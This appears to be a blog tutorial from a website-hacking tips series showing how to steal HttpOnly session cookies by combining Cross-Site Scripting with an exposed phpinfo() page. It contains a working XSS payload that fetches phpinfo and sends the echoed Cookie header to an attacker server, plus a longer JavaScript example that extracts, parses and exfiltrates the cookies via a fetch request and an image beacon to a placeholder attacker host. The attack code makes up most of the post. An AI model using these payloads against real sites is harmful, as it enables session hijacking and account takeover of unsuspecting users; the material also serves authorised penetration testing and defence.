Week 8 - Stealing HttpOnly Cookies from PHPINFO
Last updated
Have you ever been (*legally) hacking a web application and found the session cookie marked ‘HttpOnly’? With a little luck and some JavaScript, you can still get hold of a user’s session. In week 8 of the Website Hacking Tips + Tricks series, I’ll show you how.
HttpOnly is a flag set in the Set-Cookie HTTP response header. It tells the browser that the cookie must not be exposed to client-side JavaScript, so document.cookie will not return it and a plain Cross-Site Scripting payload cannot read the user’s session :/ Note what the flag does not do: the browser still attaches the cookie to every request it makes to the site, including requests our injected script triggers.
However, some PHP applications expose a PHPINFO page (the output of phpinfo()) containing details of the site’s configuration. Most importantly for us, its PHP Variables section echoes back the user’s current request, including EVERY cookie the browser sent ($_COOKIE and the raw $_SERVER['HTTP_COOKIE'] header), even the ones marked ‘HttpOnly’.
So we can write a Cross-Site Scripting payload that requests the PHPINFO page from the victim’s browser (the cookies go along for the ride), reads the returned HTML, and sends it to our server. Then we pull the cookies out and gain access to the user’s session! This can be accomplished with the JavaScript below:
<script>
// Fetch the phpinfo page from the XSS context; the browser adds the victim's cookies.
var req = new XMLHttpRequest();
req.onload = reqListener;
var url = '<target-url>/phpinfo.php';
req.withCredentials = true; // only matters for cross-origin requests; harmless here
req.open('GET', url, false); // synchronous, so onload has fired by the time send() returns
req.send();
function reqListener() {
  // Keep everything from the HTTP_COOKIE row onward; phpinfo echoes the raw Cookie header there.
  var sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE'));
  // Base64 (then URL-encode, since base64 can contain '+', '/' and '=') so the HTML survives the query string.
  var req2 = new XMLHttpRequest();
  req2.open('GET', '<attacker-server>/?data=' + encodeURIComponent(btoa(sess)), false);
  req2.send();
};
</script>
All you need to specify is the URL of the PHPINFO page (<target-url>) and the server listening for the callback (<attacker-server>). Two things to check before relying on this: the phpinfo page must actually be reachable by the victim (request it yourself first), and it must be on the same origin as the page you have XSS on, otherwise the browser will refuse to hand its response to your script.
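The payload above ships the whole page tail to the attacker and leaves the cookie extraction to be done by hand. The following is an added example (not code from the original post) that does the extraction in the browser instead: it pulls the $_SERVER['HTTP_COOKIE'] row out of phpinfo’s HTML, undoes the HTML entity encoding phpinfo applies, splits the header into individual cookies, and builds the callback URL. The sample phpinfo HTML is constructed for the example; real phpinfo markup differs between PHP versions, which is why the row matcher is deliberately loose. The fetch-based stealViaPhpinfo wrapper, the attacker hostname and the phpinfo path are all assumptions.

```javascript
// Added example: extract the echoed Cookie header from a phpinfo() page and build the exfil URL.

// Constructed sample of the relevant rows of a phpinfo() "PHP Variables" table (not a real capture).
const SAMPLE_PHPINFO = `
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">0123456789abcdef</td></tr>
<tr><td class="e">$_COOKIE['remember']</td><td class="v">yes</td></tr>
<tr><td class="e">$_SERVER['HTTP_COOKIE']</td><td class="v">PHPSESSID=0123456789abcdef; remember=yes; theme=&quot;dark&quot;</td></tr>
<tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">example.test</td></tr>
</table>`;

// phpinfo() passes values through htmlspecialchars(), so reverse the common entities (&amp; last).
function htmlDecode(s) {
  return s
    .replace(/&quot;/g, '"')
    .replace(/&#039;/g, "'")
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Return the raw Cookie header phpinfo echoed ($_SERVER['HTTP_COOKIE']), or null if the row is absent.
// Matches both the "$_SERVER['HTTP_COOKIE']" and the older "_SERVER["HTTP_COOKIE"]" label styles.
function extractCookieHeader(html) {
  const row = /HTTP_COOKIE[^<]*<\/td>\s*<td[^>]*>([\s\S]*?)<\/td>/i;
  const m = row.exec(html);
  return m ? htmlDecode(m[1].trim()) : null;
}

// Split "a=1; b=2" into an object keyed by cookie name; the first "=" separates name from value.
function parseCookieHeader(header) {
  const cookies = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    cookies[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return cookies;
}

// Base64 so the cookie string survives the query string; Buffer fallback lets this run under Node.
function toBase64(s) {
  return typeof btoa === 'function' ? btoa(s) : Buffer.from(s, 'utf8').toString('base64');
}

// Callback URL the payload requests. attackerBase is a hypothetical placeholder such as "https://attacker.example".
function buildExfilUrl(attackerBase, cookieHeader) {
  return attackerBase + '/?data=' + encodeURIComponent(toBase64(cookieHeader));
}

// Browser-side wiring for use inside the XSS context (assumed path and host). credentials: 'include'
// makes the browser send the victim's cookies; an <img> request is enough to deliver the callback.
function stealViaPhpinfo(phpinfoPath, attackerBase) {
  return fetch(phpinfoPath, { credentials: 'include' })
    .then(r => r.text())
    .then(html => {
      const header = extractCookieHeader(html);
      if (header === null) return null; // no HTTP_COOKIE row: phpinfo missing or no cookies sent
      new Image().src = buildExfilUrl(attackerBase, header);
      return parseCookieHeader(header);
    });
}
```

Running extractCookieHeader over the sample returns the full Cookie header, HttpOnly session cookie included, and parseCookieHeader gives you each cookie by name, so the callback only carries the part you care about rather than the whole page. If the page comes back without an HTTP_COOKIE row, the function returns null instead of sending an empty callback, which is the usual sign that the phpinfo path is wrong or the request was not same-origin.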